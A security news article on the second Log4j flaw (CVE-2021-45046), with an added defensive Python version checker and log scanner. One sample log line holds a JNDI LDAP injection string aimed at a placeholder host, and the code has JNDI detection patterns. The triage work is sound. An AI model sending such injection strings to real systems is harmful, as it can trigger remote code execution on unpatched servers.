
Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released
2021-12-18 05:56

The Apache Software Foundation has pushed out a new fix for the Log4j logging utility after the previous patch for the recently disclosed Log4Shell exploit was deemed as "Incomplete in certain non-default configurations."

The second vulnerability, tracked as CVE-2021-45046, is rated 3.7 out of a maximum of 10 on the CVSS rating system and affects all versions of Log4j from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0. Version 2.15.0 is the release the project maintainers shipped last week to address a critical remote code execution vulnerability that could be abused to infiltrate and take over systems.

The incomplete patch for CVE-2021-44228 could be abused to "craft malicious input data using a JNDI Lookup pattern resulting in a denial-of-service attack," the ASF said in a new advisory.

The latest version of Log4j, 2.16.0, all but removes support for message lookups and disables JNDI, the component at the heart of the vulnerability, by default.
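The two facts above that a defender acts on are the affected version ranges (2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0) and the lookup syntax that the fix removes. The following is an added triage example, not code from the article, the ASF, or the Log4j project: a version check that implements the ranges exactly as the article states them, and a log scanner that flags lookup syntax in untrusted input, treating a lookup that names JNDI as the pattern the ASF advisory describes. The function names, the regular expressions and the sample log lines are all constructed for this example.

```python
"""Added example (not from the article): CVE-2021-45046 triage helpers."""
import re
from typing import List, Optional, Tuple

# Affected ranges for CVE-2021-45046 as stated in the article above:
# 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0. 2.16.0 is the fix.
AFFECTED_RANGES = (("2.0-beta9", "2.12.1"), ("2.13.0", "2.15.0"))

# Accepts "2.15.0", "2.0" and pre-releases such as "2.0-beta9" / "2.0-rc1".
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(?:beta|rc)(\d+))?$", re.I)


def parse_version(text: str) -> Tuple[int, int, int, int, int]:
    """Turn a Log4j version string into an orderable tuple.

    Layout: (major, minor, patch, is_ga, pre_release_number). A pre-release
    (is_ga = 0) sorts before the GA release carrying the same number, so
    2.0-beta9 < 2.0 and beta8 < beta9.
    """
    match = _VERSION_RE.match(text.strip())
    if not match:
        raise ValueError(f"unrecognised Log4j version: {text!r}")
    major, minor, patch, pre = match.groups()
    is_ga = 1 if pre is None else 0
    return (int(major), int(minor), int(patch or 0), is_ga, int(pre or 0))


def is_affected_by_45046(version: str) -> bool:
    """True when `version` falls inside one of the article's affected ranges."""
    parsed = parse_version(version)
    return any(parse_version(lo) <= parsed <= parse_version(hi)
               for lo, hi in AFFECTED_RANGES)


# Any Log4j lookup (${...}) arriving in an attacker-controlled field is worth
# flagging, because 2.16.0 removes message lookups altogether; a lookup that
# names jndi is the specific pattern the advisory describes.
_LOOKUP_RE = re.compile(r"\$\{[^}]*\}")
_JNDI_RE = re.compile(r"\$\{[^}]*jndi", re.I)


def classify_line(line: str) -> Optional[str]:
    """Return 'jndi_lookup', 'lookup_syntax', or None for a clean line."""
    if _JNDI_RE.search(line):
        return "jndi_lookup"
    if _LOOKUP_RE.search(line):
        return "lookup_syntax"
    return None


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, finding, line) for every line that is not clean."""
    findings = []
    for number, line in enumerate(lines, start=1):
        finding = classify_line(line)
        if finding is not None:
            findings.append((number, finding, line))
    return findings


# Constructed sample log lines for this example; example.invalid is a reserved name.
SAMPLE_LOG = [
    'GET /index.html ua="Mozilla/5.0"',
    'GET /login ua="${jndi:ldap://example.invalid/x}"',
    'POST /api note="${date:yyyy-MM-dd}"',
]

if __name__ == "__main__":
    for v in ("2.0-beta9", "2.12.1", "2.12.2", "2.15.0", "2.16.0"):
        print(f"{v:>10}: {'affected' if is_affected_by_45046(v) else 'not affected'}")
    for number, finding, line in scan(SAMPLE_LOG):
        print(f"line {number}: {finding}: {line}")
```

The version check deliberately encodes only what the article states; release notes for later security releases (2.12.2, 2.12.3, 2.3.1 are named in the vulnerability table below for CVE-2021-44228) should be consulted before treating a back-ported build as clean. The scanner is meant for request logs or other records of untrusted input, where a lookup string has no legitimate reason to appear.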

The U.S. Cybersecurity and Infrastructure Security Agency has also added Log4Shell to its Known Exploited Vulnerabilities Catalog, giving federal agencies a deadline of December 24 to incorporate patches for the vulnerability.

"The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems. This vulnerability can be everywhere," Gallagher added.

News URL

https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html

Related Vulnerability

DATE        CVE             VULNERABILITY TITLE                                                   RISK
2021-12-14  CVE-2021-45046  Expression Language Injection vulnerability in multiple products      critical (9.0)
            It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations.
            Attack vector: network; attack complexity: high; vendors: apache, intel, siemens, debian, sonicwall, fedoraproject; CWE-917
2021-12-10  CVE-2021-44228  Deserialization of Untrusted Data vulnerability in multiple products  10.0
            Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.